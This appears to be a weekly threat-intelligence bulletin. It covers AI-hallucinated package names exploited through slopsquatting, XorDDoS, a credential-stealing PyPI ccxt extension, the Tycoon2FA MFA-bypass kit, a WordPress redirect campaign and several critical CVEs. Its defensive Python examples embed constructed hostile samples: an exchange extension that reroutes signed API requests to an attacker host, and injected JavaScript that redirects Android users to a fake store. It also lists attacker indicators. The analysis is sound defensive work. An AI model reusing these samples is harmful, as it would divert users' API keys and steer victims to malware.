
ECHO Cyber Threat Panorama: Weekly Threat Intelligence Bulletin (28.04.2025 Security News)

Introduction

The weekly Cybersecurity Bulletin is prepared by the ECHO team to summarize the cybersecurity incidents of recent weeks and keep readers informed.


Executive Summary

This bulletin:

  • Provides up-to-date information on cyber threats such as attacks, data leaks, malware, ransomware, and critical vulnerabilities.
  • Summarizes our security team's weekly analysis of these threats so that readers can minimize their exposure.
  • Collects the week's security news.

Malware of the Week: Slopsquatting: The Next Generation Software Supply Chain Risk

Description

With the increasing use of AI-powered code generation tools (e.g. GPT-4, CodeLlama, DeepSeek), a new type of supply chain attack called "Slopsquatting" has emerged. It exploits the tendency of language models to hallucinate dependency names that do not exist. An attacker registers those names on a public registry, and developers who paste the generated code and install its dependencies unknowingly pull the attacker's package into their project, assuming the model's suggestion was trustworthy.

This is a new threat to software supply chain security that relies on developers' trust in generated code rather than on a technical flaw. It is aimed at open source package registries such as PyPI and npm, where anyone can publish a package under a name nobody has claimed yet.

Vulnerability Definition

  • Vulnerability Type: Supply chain manipulation / social engineering-based dependency exploitation
  • Term: Slopsquatting
  • Similar to: Typosquatting
  • Difference: Slopsquatting is not a typo; it is aimed at completely imaginary, AI-made-up package names.
  • Domains: PyPI, npm, open-source LLMs, commercial AI code assistants (ChatGPT, GitHub Copilot, DeepSeek, etc.)

Technical Details

A study examined 576,000 code samples generated in Python and JavaScript and found that roughly 20% of the recommended packages did not exist. The hallucinations were also stable: 43% of the fake names came back in every one of ten repeat runs of the same prompt, and 58% came back more than once. Names that predictable can be harvested by an attacker simply by prompting the model, then registered in advance to distribute malware.

  • Scope of Research: The study, published in March 2025, examined 576,000 code samples in Python and JavaScript.
  • Hallucination Rate:
  • About 20% of the suggested packages are not real
  • Around 5% for GPT-4 (commercial models hallucinate far less than open-source ones)
  • More than 200,000 unique fake package names detected
  • Repeatability:
  • 58% of the fake names recurred more than once across ten runs of the same prompt
  • 43% recurred in all ten runs
  • Origin Analysis:
  • 38% resemble a real package (name inspired by an existing one)
  • 13% are typos of a real package name
  • 51% are entirely fabricated

Impact

  • Code Compromise: Developers may trust the outputs they receive from AI and include fake packages in the project.
  • Supply Chain Poisoning: Fake packages containing malware (e.g. backdoor, keylogger) may integrate into systems.
  • Automation Systems Risk: CI/CD, AI-powered code recommendation systems, and package managers may be affected.
  • Attack Vector Breadth: Because the same hallucinated names recur, attackers can generate their target list by querying the models themselves and register the names before any developer does.

Operation Mechanism

  • LLM Applications:
  • Imaginary dependencies such as import fakelib (Python) or require('imaginary-dep') (JavaScript) appear in generated code snippets
  • Package Publishing Process:
  • Attackers publish packages under these fake names on PyPI, npm and similar registries as if they were legitimate
  • AI Code Suggestion Systems:
  • The model suggests the same made-up package again in later requests, so the registered name keeps being installed

Another Malware of the Week: XorDDoS Malware and New Control Infrastructure

Description

A new version of the XorDDoS malware and its upgraded command-and-control (C2) infrastructure have been revealed. The malware builds a botnet, mainly from Linux systems, for use in distributed denial of service (DDoS) attacks. A new control panel and a central controller, sold as the "VIP version", show that the operation has become more organized and more widespread.

Technical Details

  • Malware: XorDDoS
  • Target Systems: Linux-based servers, especially Docker servers
  • Spreading Method: Initial access is gained by SSH brute-force attacks; once root access is obtained, the malware is installed.
  • Persistence:
  • Init script under /etc/init.d/
  • cron job entry
  • Configuration Encryption: XOR encryption (key: BB2FA36AAA9541F0)
  • C2 Server Connection: The malware decrypts its embedded URL/IP list and connects to the listed C2 servers.
  • Dropped Payload: An ELF executable that runs on the system with root privileges.
  • Control Infrastructure: Central controller, sub-controllers and the VIP version control panel
  • Languages Used: Simplified Chinese interface and instructions

Impact

  • Botnet Network: Infected systems are turned into "zombie" bots and directed at DDoS targets.
  • Evasion: Encrypted configuration and anti-detection modules make the malware harder to spot.
  • Advanced Command and Control: New “central controller” infrastructure can manage multiple XorDDoS sub-controllers simultaneously.
  • Global Spread: XorDDoS has targeted many countries around the world: USA, Spain, Taiwan, Canada, Japan, Brazil, Paraguay, Argentina, United Kingdom, Netherlands, Italy, Ukraine, Germany, Thailand, China, India, Israel, Venezuela, Switzerland, Singapore, Finland, Australia, Saudi Arabia, France, Turkey, UAE, South Korea.

Codes / Functions of the Vulnerability

  • XOR Key Usage: BB2FA36AAA9541F0, applied as a repeating key to the embedded configuration and C2 list
  • Controller Binder: A DLL injected to give the central controller management of its sub-controllers.
  • VIP Builder Features:
  • 1024 packet DDoS capacity
  • Advanced resource management
  • Firewall penetration ("wall-penetration") capability
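Two things an analyst does with the details above are recover the C2 list from a sample and check a host for the persistence it leaves behind. The following is an added example, not the malware's code or any vendor's tool: xor_transform() applies the repeating-key XOR with the key quoted above (the same call builds a test blob from a constructed plaintext and decrypts a carved one), carve_c2_list() pulls host:port entries out of the result, and find_persistence() scans init.d names and crontab lines. Only the key comes from the report; the NUL-separated plaintext layout and the "ten random lowercase letters" filename heuristic are assumptions for the example.

```python
"""
Added example (not XorDDoS code): repeating-key XOR with the key reported for the
malware's configuration, plus a persistence check over constructed init.d and crontab
content. The config layout and the random-filename heuristic are assumptions.
"""
import re

XOR_KEY = b"BB2FA36AAA9541F0"   # key from the report; applied byte-wise, repeating


def xor_transform(data: bytes, key: bytes = XOR_KEY) -> bytes:
    """Repeating-key XOR; symmetric, so the same call encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def carve_c2_list(blob: bytes, key: bytes = XOR_KEY) -> list[str]:
    """Decrypt a config blob and return the host:port entries (assumed NUL-separated layout)."""
    plain = xor_transform(blob, key)
    entries = [p.decode("ascii", "ignore") for p in plain.split(b"\x00") if p]
    return [e for e in entries if re.fullmatch(r"[A-Za-z0-9.\-]+:\d{1,5}", e)]


# Assumed heuristic: the dropper uses random ten-letter names for its binary and init script.
RANDOM_NAME = re.compile(r"^[a-z]{10}$")
RANDOM_PATH = re.compile(r"/(?:etc/init\.d|usr/bin|lib|bin|boot)/([a-z]{10})\b")


def find_persistence(initd_names: list[str], crontab_lines: list[str]) -> list[str]:
    """Report randomly named init scripts and cron jobs that launch a randomly named binary."""
    findings = []
    for name in sorted(n for n in initd_names if RANDOM_NAME.match(n)):
        findings.append(f"init script with random name: /etc/init.d/{name}")
    for line in crontab_lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        for token in RANDOM_PATH.findall(line):
            findings.append(f"cron job runs random-named binary {token}: {line}")
    return findings


if __name__ == "__main__":
    # Constructed config: two C2 entries and a filler field, NUL-separated, then XORed.
    sample_plain = b"192.0.2.10:3306\x00c2.example.net:8888\x00version=VIP\x00"
    sample_blob = xor_transform(sample_plain)
    print("C2 list:", carve_c2_list(sample_blob))
    # Constructed host artefacts in the shape the bulletin describes.
    print(find_persistence(["sshd", "hxcbmvqwrt"],
                           ["*/3 * * * * root /usr/bin/hxcbmvqwrt", "# comment"]))
```

The filename heuristic will also match legitimate ten-letter names (networking, for one), so treat a hit as a lead to confirm with the binary's hash and its outbound connections, not as a verdict.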

Malicious Python Library of the Week: Malicious PyPI Package Targeting MEXC APIs

Description

In April 2025, the malicious Python package named ccxt-mexc-futures, detected on PyPI (Python Package Index), was uploaded to steal developers’ API keys on the MEXC cryptocurrency exchange. This package pretended to be an extension of the popular ccxt (CryptoCurrency eXchange Trading) library, but actually contained malicious code.

Malware Details

  • Package Name: ccxt-mexc-futures
  • Distribution: PyPI (now removed)
  • Download Count: 1,065+
  • Target: Developers trading on the MEXC crypto exchange
  • Behavior:
  • The ccxt functions describe, sign and prepare_request_headers have been overridden
  • Fake API endpoints such as contract_private_post_order_submit, contract_private_post_order_cancel and spot4_private_post_order_place have been added

Technical Details

  • The package pulls its configuration from the fake domain v3.mexc.workers[.]dev
  • API requests are redirected to the attacker-controlled server greentreeone[.]com
  • The MEXC API key and secret key are transmitted directly to that server
  • When the user creates or cancels an order, the request goes to the attacker's system instead of MEXC
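A package that behaves as described above leaves two static traces: a class that inherits from a ccxt exchange and overrides the request-building hooks, and hostnames in string literals that are not the exchange's own. The following is an added example, not code from the malicious package or from ccxt: triage_module() parses a module with the ast module, records which of describe, sign and prepare_request_headers each ccxt-derived class overrides, and lists every hostname in a literal that is outside an expected-host allowlist. SAMPLE_EXTENSION is a constructed stand-in showing the shape of the behaviour, not the real ccxt-mexc-futures source, and the allowlist is an assumption.

```python
"""
Added example (not code from ccxt-mexc-futures or from ccxt): static triage of a
third-party "ccxt extension" before it is installed or trusted. The sample module and
the expected-host allowlist are constructed for the example.
"""
import ast
import re

EXCHANGE_HOOKS = {"describe", "sign", "prepare_request_headers"}
EXPECTED_HOSTS = {"api.mexc.com", "contract.mexc.com", "www.mexc.com"}   # assumed allowlist
HOST_RE = re.compile(r"\b([a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,})\b", re.I)


def _derives_from_ccxt(cls: ast.ClassDef) -> bool:
    return any("ccxt" in ast.unparse(base) for base in cls.bases)


def triage_module(source: str) -> dict:
    """Return overridden hooks per ccxt-derived class and unexpected hostnames in literals."""
    overrides: dict[str, list[str]] = {}
    hosts: set[str] = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.ClassDef) and _derives_from_ccxt(node):
            hooked = [fn.name for fn in node.body
                      if isinstance(fn, (ast.FunctionDef, ast.AsyncFunctionDef))
                      and fn.name in EXCHANGE_HOOKS]
            if hooked:
                overrides[node.name] = hooked
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            hosts.update(h.lower() for h in HOST_RE.findall(node.value))
    return {"overrides": overrides, "unexpected_hosts": sorted(hosts - EXPECTED_HOSTS)}


# Constructed stand-in for a malicious extension: it fetches its "futures" endpoint from a
# lookalike domain and rewrites every signed request's URL to an attacker host.
SAMPLE_EXTENSION = '''
import ccxt

class mexc_futures(ccxt.mexc):
    def describe(self):
        d = super().describe()
        d["urls"]["api"]["futures"] = "https://v3.mexc.workers.dev"
        return d

    def sign(self, path, api="public", method="GET", params={}, headers=None, body=None):
        request = super().sign(path, api, method, params, headers, body)
        request["url"] = request["url"].replace("api.mexc.com", "greentreeone.com")
        return request
'''

if __name__ == "__main__":
    report = triage_module(SAMPLE_EXTENSION)
    for cls, hooks in report["overrides"].items():
        print(f"{cls} overrides {', '.join(hooks)}")
    print("hosts outside allowlist:", report["unexpected_hosts"])
```

Run it over every .py file in the wheel or sdist before installing; an override of sign combined with any host outside the exchange's domains is exactly the combination that diverts API keys.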

Impact

  • API Key Compromise: Developer’s authorization information can be stolen
  • Full API Control: Attacker can create and cancel orders on behalf of the user
  • Financial Loss: Can cause theft of crypto assets

Phishing Campaign of the Week: Tycoon2FA Phishing Kit Targets Microsoft 365 Users

Description

Tycoon2FA is an advanced Phishing-as-a-Service (PhaaS) kit that targets Microsoft 365 and Gmail accounts. It is particularly notable for its ability to bypass multi-factor authentication (2FA/MFA), and in 2025 it was updated with several new techniques to evade detection.


Malware Details

  • Name: Tycoon2FA
  • Type: Phishing-as-a-Service (PhaaS)
  • Targets: Microsoft 365 and Gmail users
  • First Detection: October 2023
  • Developer: Saad Tycoon group
  • Distribution: Via private Telegram channels

Technical Details

Tycoon2FA uses reverse proxy servers placed between the victim and the legitimate login page (an adversary-in-the-middle setup). The proxy relays the victim's credentials and MFA response to the real service, and the session cookie the service issues after a successful login passes back through the proxy, where the attacker captures it. Replaying that cookie grants access to the account without triggering MFA again, which is how the kit bypasses MFA.

New techniques have been added with the updates made in 2025 that make it harder to detect the kit:

1. Unicode Obfuscation

  • Invisible Unicode characters are injected into the JavaScript to hide the malicious payload: the payload's binary data is spelled out in characters that render as nothing.
  • The technique is aimed at manual analysis and static, signature-based security tools, which see no readable code.

2. CAPTCHA Evasion

  • Custom CAPTCHA built with HTML5 Canvas is used instead of Cloudflare Turnstile.
  • Because the CAPTCHA is self-hosted and its Canvas elements are randomized, the page no longer calls a third-party service and evades domain reputation systems that key on such calls.

3. Anti-Debug JavaScript

  • The script detects browser automation and analysis tools such as PhantomJS and Burp Suite and blocks the associated actions.
  • When analysis is suspected, the visitor is redirected to a legitimate site (for example rakuten.com) instead of the phishing page.

4. SVG File Abuse

  • Malicious SVG files, whose use rose by 1800% between 2024 and 2025, are disguised as voice messages and redirect the user to a phishing page.
  • JavaScript in SVG is obfuscated using methods such as Base64, ROT13 and XOR.

Impact

  • Users are redirected to fake Microsoft Teams/Office 365 login pages and their credentials are stolen.
  • Multi-factor authentication is defeated by stealing the authenticated session rather than the second factor itself.
  • Chain phishing attacks can be launched by hijacking internal email chains.
  • Accessing MFA-protected accounts can lead to serious consequences such as data leakage, identity theft and the compromise of corporate systems.

Attack Campaign of the Week: Proton66-Related Campaign: WordPress Sites Abused to Target Android Users

Description

According to research conducted by Trustwave SpiderLabs, attacks from IP addresses associated with the Proton66 ASN (AS198953) have compromised several WordPress sites and used them as distribution points for malware targeting Android device users. The research reveals that this campaign involves various types of malware and phishing attempts conducted via fake Google Play stores.

Detected Malware and Their Effects

  • IP Used: 91.212.166.21
  • Target Audience: Android users
  • Redirection Mechanism: Redirect scripts hidden with JavaScript obfuscation
  • Fake Store Domains:
  • us-playmarket.com
  • playstors-france.com
  • Detected Malware:
  • XWorm: RAT targeting Korean-speaking users
  • StrelaStealer: Credential stealer
  • WeaXor: Ransomware

Technical Details

  • JavaScript Redirection Script: getupd.js redirects Android devices only.
  • Bot Detection: The script screens out VPN, proxy, and crawler traffic before redirecting.
  • IP Verification:
  • https://api.ipify.org
  • https://ipinfo.io – API Key: 3afcf479c3f3e0
  • Hosting Infrastructure: Bulletproof hosting services such as UNDERGROUND and BEARHOST
  • Infrastructure Migration: Some IPs were moved to other networks, such as the Chang Way Technologies ASN
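Finding the injected redirector on a compromised WordPress site comes down to looking for the traits listed above. The following is an added example, not Trustwave's or the attackers' code: it scores theme and plugin files on whether they contain an Android-only user-agent check, a visitor IP lookup against api.ipify.org or ipinfo.io, a VPN/proxy/crawler filter, a redirect, and any of the fake store domains. The file contents are constructed samples; the exact wording of the real getupd.js is not on the page, and obfuscated scripts need to be decoded before this scan can see the traits.

```python
"""
Added example (not code from the campaign or from Trustwave): a trait scanner for
WordPress files, looking for the redirect behaviour the bulletin describes. The file
contents below are constructed samples.
"""
import re

FAKE_STORES = {"us-playmarket.com", "playstors-france.com"}   # domains from the report
TRAITS = {
    "android_ua_check": re.compile(r"android[^;\n]{0,80}navigator\.userAgent|navigator\.userAgent[^;\n]{0,80}android", re.I),
    "ip_lookup": re.compile(r"api\.ipify\.org|ipinfo\.io", re.I),
    "bot_filter": re.compile(r"\b(vpn|proxy|crawler|bot|hosting)\b", re.I),
    "redirect": re.compile(r"location(?:\.href)?\s*=|window\.location\.replace\(", re.I),
    "external_loader": re.compile(r"<script[^>]+src=[\"']https?://[^\"']*getupd\.js", re.I),
}
DOMAIN_RE = re.compile(r"[a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,}")


def score_file(content: str) -> dict:
    """Count the redirector traits present in one file."""
    hits = {name: bool(rx.search(content)) for name, rx in TRAITS.items()}
    hits["fake_store"] = bool(set(DOMAIN_RE.findall(content.lower())) & FAKE_STORES)
    return {"score": sum(hits.values()), "traits": [k for k, v in hits.items() if v]}


def scan(files: dict[str, str], threshold: int = 3) -> list[tuple[str, int, list[str]]]:
    """Return (path, score, traits) for files at or above the threshold, worst first."""
    results = []
    for path, content in files.items():
        r = score_file(content)
        if r["score"] >= threshold:
            results.append((path, r["score"], r["traits"]))
    return sorted(results, key=lambda t: -t[1])


# Constructed samples: one footer with an injected gate-and-redirect, one clean header.
INJECTED = """<?php wp_footer(); ?>
<script>
if (/android/i.test(navigator.userAgent)) {
  fetch("https://api.ipify.org?format=json").then(r => r.json())
    .then(j => fetch("https://ipinfo.io/" + j.ip + "/json?token=REDACTED")).then(r => r.json())
    .then(i => { if (!/vpn|proxy|hosting/i.test(i.org || "")) location.href = "https://playstors-france.com/app"; });
}
</script>"""
CLEAN = "<?php get_header(); ?>\n<a href='https://wordpress.org'>Powered by WordPress</a>\n"

if __name__ == "__main__":
    for path, score, traits in scan({"wp-content/themes/x/footer.php": INJECTED,
                                     "wp-content/themes/x/header.php": CLEAN}):
        print(f"{path}: score {score}, traits {traits}")
```

Point it at wp-content as well as the core files (wp-includes is a favourite place for injected loaders) and pair it with the upload dates: an injected file usually has a modification time that does not match the rest of the theme.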

Impact

  • Users: Redirected to fake stores containing malicious APK files, thus compromising their devices.
  • Data Leakage: Credentials, device content, and other sensitive data are stolen.
  • Web Infrastructure: Compromised WordPress sites become part of the attack chain.

Featured Vulnerability of the Week: Critical Session Management Vulnerability in Apache Roller (CVE-2025-24859)

Description

Apache Roller is a Java-based open-source blogging platform. A recently disclosed vulnerability, CVE-2025-24859, affects its session management: existing sessions remain valid even after a user or administrator changes the password. An attacker who already holds a valid session can therefore keep unauthorized access after the password has been rotated.

Detected CVE

  • CVE ID: CVE-2025-24859
  • Vulnerability Type: Insufficient Session Termination (CWE-613)
  • Versions Affected: Apache Roller 1.0.0 – 6.1.4 (fixed in 6.1.5)
  • CVSS Score: 10.0 (Critical)
  • Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
  • Impact: Active sessions remain valid even after password changes, increasing the risk of unauthorized access

Technical Detail

In Apache Roller 6.1.4 and earlier, existing sessions stay valid when a user's password is changed because the application has no centralized session management: nothing tracks which sessions belong to a user, so nothing can revoke them when the credential changes. An attacker who has obtained a user's session identifier (for example from a stolen cookie) can keep using it after the password is reset.

Impact of the Vulnerability

  • Unauthorized Access: Attackers can maintain access to the system even after password changes.
  • Data Leakage: The risk of critical data being compromised by unauthorized individuals increases.
  • Ineffectiveness of Security Measures: Standard security measures such as password changes are rendered ineffective due to this vulnerability.

Featured Vulnerability of the Week: Critical Erlang/OTP SSH Vulnerability (CVE-2025-32433) – Code Execution Without Authentication

Description

In April 2025, a critical vulnerability (CVE-2025-32433) was discovered in the Erlang/Open Telecom Platform (OTP) SSH library. This vulnerability could allow an attacker with network access to remotely execute arbitrary code without authentication. The vulnerability was discovered by security researchers at Ruhr University Bochum and has been rated as critical with a CVSS score of 10.0.

The impact of this vulnerability is widespread, since Erlang/OTP components are widely used in telecom, IoT, OT, and edge devices.

Detected CVE

  • CVE ID: CVE-2025-32433
  • CVSS Score: 10.0 (Critical)
  • Vulnerability Type: Remote Code Execution (RCE)
  • Affected Component: Erlang/OTP SSH Daemon
  • Affected Versions:
  • OTP-27.3.2 and earlier
  • OTP-26.2.5.10 and earlier
  • OTP-25.3.2.19 and earlier
  • Fix Versions:
  • OTP-27.3.3
  • OTP-26.2.5.11
  • OTP-25.3.2.20

Technical Detail

The vulnerability is due to improper handling of SSH protocol messages before authentication: the daemon processes connection-protocol messages from a client that has not yet authenticated, so a specially crafted sequence of messages reaches code that should only be reachable after login, without any credentials.

  • If the SSH daemon is running with root privileges, the attacker can gain full system control.
  • On affected systems, this could lead to serious consequences such as ransomware installation, data exfiltration, or service disruption.
  • The root cause lies in the ssh application's message-handling modules, ssh_connection.erl in particular, which did not check the connection's authentication state before acting on connection-protocol messages.

Impact

  • Remote code execution without authentication
  • Complete system takeover with root privileges
  • Increased risk of system disablement (DoS) in IoT and telecom infrastructures
  • Exposure of critical systems, since OTP-based components ship in infrastructure products from vendors such as Cisco and Ericsson

Featured Vulnerability of the Week: 2 Critical Vulnerabilities Actively Exploited in Apple iOS Platform (CVE-2025-31200, CVE-2025-31201)

Description

On April 17, 2025, Apple released security updates for two vulnerabilities that were already being actively exploited, affecting iOS, iPadOS, macOS Sequoia, tvOS, and visionOS. The vulnerabilities have been used in targeted attack campaigns and allow memory corruption and the bypass of a core security mechanism on affected devices.

CVEs Identified

1. CVE-2025-31200

  • Vulnerability Type: Memory Corruption
  • Component: Core Audio
  • CVSS Score: 7.5
  • Description: During processing of maliciously crafted media files, a memory corruption occurs in the Core Audio module, leading to arbitrary code execution.
  • Solution: Improved control mechanisms for memory limits were added.
  • Reported by: Google TAG and Apple

2. CVE-2025-31201

  • Vulnerability Type: Pointer Authentication Bypass
  • Component: RPAC
  • CVSS Score: 6.8
  • Description: An attacker who has already obtained arbitrary read and write access can bypass Pointer Authentication, defeating a check that is meant to stop exactly that kind of memory corruption from being turned into control-flow hijacking.
  • Solution: The vulnerable code was removed.

Technical Details

  • CVE-2025-31200: Files containing malicious audio streams can trigger heap or stack memory corruption in the Core Audio module, leading to the possibility of Remote Code Execution (RCE).
  • CVE-2025-31201: The authentication mechanism (Pointer Authentication) can be bypassed via pointer manipulation in the RPAC component. This can lead to compromised system integrity and unauthorized actions.

Impact

  • The vulnerabilities are actively used in advanced targeted attack campaigns.
  • It may be possible to bypass iOS sandbox protections and gain kernel-level access.
  • A user can be compromised simply by opening a crafted media file.
  • Personal data can be compromised, and device control can be taken over by attackers.

Codes / Functions of the Vulnerability

  • Audio stream handler functions in the Core Audio component
  • Pointer authentication wrapper functions in the RPAC component
  • Apple removed the weak code in these modules and added bounds checks.